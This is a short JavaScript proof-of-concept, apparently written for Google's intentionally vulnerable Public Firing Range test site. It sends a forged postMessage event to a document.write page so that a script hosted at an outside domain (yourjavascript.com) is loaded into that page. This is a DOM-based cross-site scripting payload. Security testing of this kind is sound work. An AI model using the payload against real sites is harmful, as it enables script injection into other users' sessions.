/* eslint-disable */
function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}
/* eslint-disable */
async function demo() {
  var x = window.open(
"http://public-firing-range.appspot.com/dom/toxicdom/postMessage/documentWrite");
  var e = new Event('message');
  e.data = '{"url": "http://yourjavascript.com/1298103092/script.js"}';
  await sleep(2000);
  x.dispatchEvent(e);
}
/* eslint-disable */
demo();